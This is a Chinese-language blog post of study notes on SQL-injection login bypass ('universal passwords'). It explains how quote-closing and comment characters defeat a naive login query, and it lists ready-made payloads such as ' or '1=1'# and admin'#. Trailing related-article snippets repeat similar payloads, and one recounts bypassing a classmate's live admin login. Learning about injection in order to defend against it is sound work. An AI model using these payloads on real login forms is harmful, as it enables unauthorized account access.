网络安全学习笔记——万能密码

已于 2023-11-04 16:12:32 修改
阅读量261 收藏 1
点赞数 1
文章标签: 数据库 服务器 运维
于 2023-08-05 21:36:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_72324806/article/details/132124959
版权

万能密码

万能密码也是和闭合的概念一样的,多用于登录框,就是可以随便输入,但仍能登录进去

万能密码账号框输入' or '1=1'# 之后,密码框可以随便输入,因为会被注释符注释掉;但是如果在注释符被过滤的时候,账号框和密码框都必须要输入 ' or '1=1 或者' or '1=1' '

admin :123456 在应用中是非常常见且经典的一个弱口令

数据库查询——在username, password这两个表下面查找输入的内容,如果输入内存在表里(即输入账号密码确实是该数据库的账号,就会登录成功;否则就会失败),且只查询第一个————因为一般账号密码不会有重复的
SELECT username, password FROM users WHERE username='admin' and password='123456' LIMIT 0,1

如果在设计登录框的时候设计的逻辑存在漏洞,就会存在SQL注入,此时就称为万能密码
万能密码就是使数据库的账号密码无论是什么,都可以登陆进去,然后登录其管理员账号,修改管理员账号,此时就可以使用这个账号登录进去

SELECT username, password FROM users WHERE username='' or '1=1'#' and password='' or '1=1'#' LIMIT 0,1
此时,' 是用来闭合之前的单引号的,然后或一个真,其整体结果为真,#就相当于注释符,出现#之后,后面的语句就都被注释了,不再执行————也就是说,只要在账号一栏上输入的是 ' or '1=1'# ,后面密码一栏输什么都会注入成功之后
由于逻辑上,同一时间只能登录一个账号,所以————在靶场11里。万能密码回显的是第一个账号密码

如果不使用注释符,如 #,-- - 等,还怎么让万能密码仍能使用

由于原来注释符是用来注释账号密码框里的后单引号(前面的单引号已经被注入语句里的 ' or '1=1'# 注释掉了,所以就会多余一个后单引号),如果逻辑设计上过滤了注释符的话,必须想办法使后面的单引号也闭合

所以有两种方法,基于原来的带注释符的万能密码' or '1=1'#

①' or '1=1    逻辑真后面不加单引号,此时后单引号与逻辑真闭合

②' or '1=1' '  逻辑真后面再加一个单引号,此时后单引号与该单引号闭合

通过以上的闭合,万能密码仍能使用

数值型万能账号

  • a or true #
  • a or 1 #
  • a or 1=1 #
  • a or true – a
  • a or 1 – a
  • a or 1=1 – a

引号字符型万能密码

  • a" or true #
  • a" or 1 #
  • a" or 1=1 #
  • a" or true – a
  • a" or 1 – a
  • a" or 1=1 – a

万能账号的使用

  • 账号输入: a or true #
  • 密码随便输入,比如:123456

数值型万能密码

  • admin #
  • admin – a

引号字符串型万能密码

  • admin' #
  • admin' – a

万能密码的使用

  • 用户名输入: admin'#
  • 密码随便输入,比如: 123456
Nosery
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
AI学习笔记——卷积神经网络(CNN)
02-24
上篇文章简单地地介绍了神经网络和深度学习,在神经网络中,每一层的每个神经元都与下一层的每个神经元相连(如下图),这种连接关系叫全连接(FullConnected)。如果以图像识别为例,输入就是是每个像素点,那么每一...
C语言学习笔记——小浪神
10-04
C语言学习笔记——小浪神 本笔记是关于C语言的学习笔记,涵盖了C语言的基本概念、历史发展、语言特点、数据类型、变量、常量、算法等方面的知识点。 计算机程序的概念 计算机程序是指一组能够被计算机识别和执行...
万能密码或账号登录语句
weixin_44257023的博客
03-29 2473
账号输入: a or true #密码随便输入,比如: 123456。密码随便输入,比如:123456。用户名输入: admin’ #
常用的万能密码
weixin_30484247的博客
12-18 1125
万能密码是基于sql语句的查询漏洞。 asp aspx万能密码 1:"or "a"="a 2:'.).or.('.a.'='.a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or.'a.'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' admin'or 1=1#PHP万...
万能密码使用原理
熹微晨光的博客
10-08 4893
万能密码使用原理 RT,很多人都觉得万能密码就是’or’=’or’,其实则不然。 “万能密码”这个称呼我觉得并不是很恰当,因为万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特点来进行非法登录的。 我们首先来看一个实例。在某网站的后台登录页面
SQL注入点判断及万能密码
zhhhb1005的博客
04-10 2970
SQL注入漏洞的类型 1.单引号判断 http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示,则该网站可能就存在注入漏洞。 2.and判断 http://www.xxx.com/xxx.asp?id=10'and 1=1这个条件永远都是真的,所以当然返回是正常页 http://www.xxx.com/xxx.asp?id=10'and 1=2如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。 3.Or判断(or跟and判断方法不...
Mysql漏洞注入——万能密码
qq_66985187的博客
03-14 1026
万能密码,mysql绕过验证和web渗透测试
Solidworks学习笔记——随形变化.docx
07-13
Solidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——随形变化.docxSolidworks学习笔记——...
JBPM学习笔记——流程设计与控制
03-03
火龙果软件工程技术中心 相关资料:《jBPM学习笔记(V3.2环境部署)》《jBPM学习笔记(框架设计简介)》背景本片文章,我们将从业务流程的设计开始,通过带领大家完成一个完整工作流的程序设计,来学习jPDL的使用。...
数据库万能密码与密码解析
Zyh's blog
01-13 3455
数据库
数据库万能解密器-解管理系统专用
04-28
功能介绍:IdealAccesskey 是一款ACCESS数据库文件密码查看软件, 操作方便、简单易用! 它可以查看包括ACCESS97,ACCESS2000等等在内的数据库软件的英文,中 文密码,它可以打开单独一个文件查看,也可以打开指定文件夹批量查看, 软件支持文件拖放,可以复制密码,查看文件属性,非常方便,同时软件 还可以进行数据库压缩,数据转换Access ---> Excel,Access ---> Txt, Access ---> dbf, Access ---> db 等.
万能密码(sql注入)
最新发布
hk_hkl的博客
07-17 5618
万能密码利用的原理就是在后台登陆页面没有对用户输入的内容进行验证,此时程序所用用户输入的数据都合法的,所以这个时候无论是合法的管理员还是非法的入侵者所输入的数据都是被信任的,非法入侵者正是利用这一特点来进行非法登录的。当我们在登录界面输入 【万能账号】比如 a’ or true # 以后,后端会将我们输入的参数拼接到SQL中,然后去数据库中查询账号和密码。,所以这需要使用 a’ or 1 – a 而不是 a’ or 1 --a 其原理和 a’ or 1 # 大同小异。
sql注入之万能密码总结
weixin_45778886的博客
12-03 1万+
万能密码 万能密码原理 原验证登陆语句: SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."' 输入 1′ or 1=1 or ‘1’=’1万能密码语句变为: SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG' 即得到优先级关系:or&lt
sql注入时带引号屏蔽的怎么处理
Huamang的博客
02-09 5070
写了学长给的一个题目,第一关就是一个sql注入,但是尝试了万能密码是不管用的,因为题目把单引号给过滤掉了,无法使用单引号来闭合 $sql = "SELECT username, password FROM user WHERE username='" .$user ."' && password='" .$pass ."'"; 要想闭合sql语句加上or 1=1#来使判断条件为真,我学到了一个操作:使用\转义 用\转义后面的单引号 在用户名框输入\,密码框输入or 1=1 #,这样提交后,
sql注入:万能钥匙注入
qq_25987491的博客
04-17 3916
  根据提示,这道题使用sql输入,题目中说已经使用过滤,但是我们还是要试试,看看是不是所有特殊字符都被过滤了,如图,进行尝试之后,得到结果:可知,引号没有被过滤。所以我们可以使用万能密码万能密码:也就是使用逻辑语句使结果返回。普通的select语句为:select * from user where username = 'user' and password = 'passwd'  因为引号...
SQL万能密码
qq_43776408的博客
06-13 2063
SQL万能密码:’ or 1=1 select name,pass from tbAdmin where name=‘admin’ and pass=‘123456’ 输入用户名:’ or 1=1 SQL变成下面这个样子: select name,pass from tbAdmin where name=’’ or 1=‘1’ and pass=‘123456’ 1=‘1’ 永远为真,所以就验证通过了。。。 ...
SQL注入(万能密码)
qq_69432323的博客
03-14 5391
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)
【业务安全04】万能用户名及万能密码
Fighting_hawk的博客
03-17 4508
1. 加深理解SQL语句构造与绕过; 2. 掌握万能用户名与密码检测的方法。
万能密码:‘or 1=1-- 实战SQL注入,秒破后台
热门推荐
杨明金的博客
10-24 3万+
主要是没有对登录密码的字符串进行参数化和过滤,所以导致网站可以直接用“万能密码”进行突破登录 仅供学习交流 这是某同学做的网站,今天无聊打开了,并帮他进行测试一下 看到这个后台,感觉做的还是不错的,首先SQL注入一般这种“万能密码”在99%的网站都是没有用的了,因为几乎所有发布到网络上的网站都是有进行安全考虑的,像这种学生的学术作品的话,一般不会考虑那么多,所以直接使用万能密码进行登录后台 万能密码:'or 1=1-- 用户名随便输入,密码填写这个,输入验证码,ok,大功告成 直接就.
jQuery学习笔记——事件
06-08
好的,关于 jQuery 的事件,我可以和你分享一些学习笔记。 1. 绑定事件 在 jQuery 中,我们可以通过以下方式来绑定事件: ``` $(selector).event(function(){ // 事件处理程序 }) ``` 其中,`selector` 表示要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Nosery

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值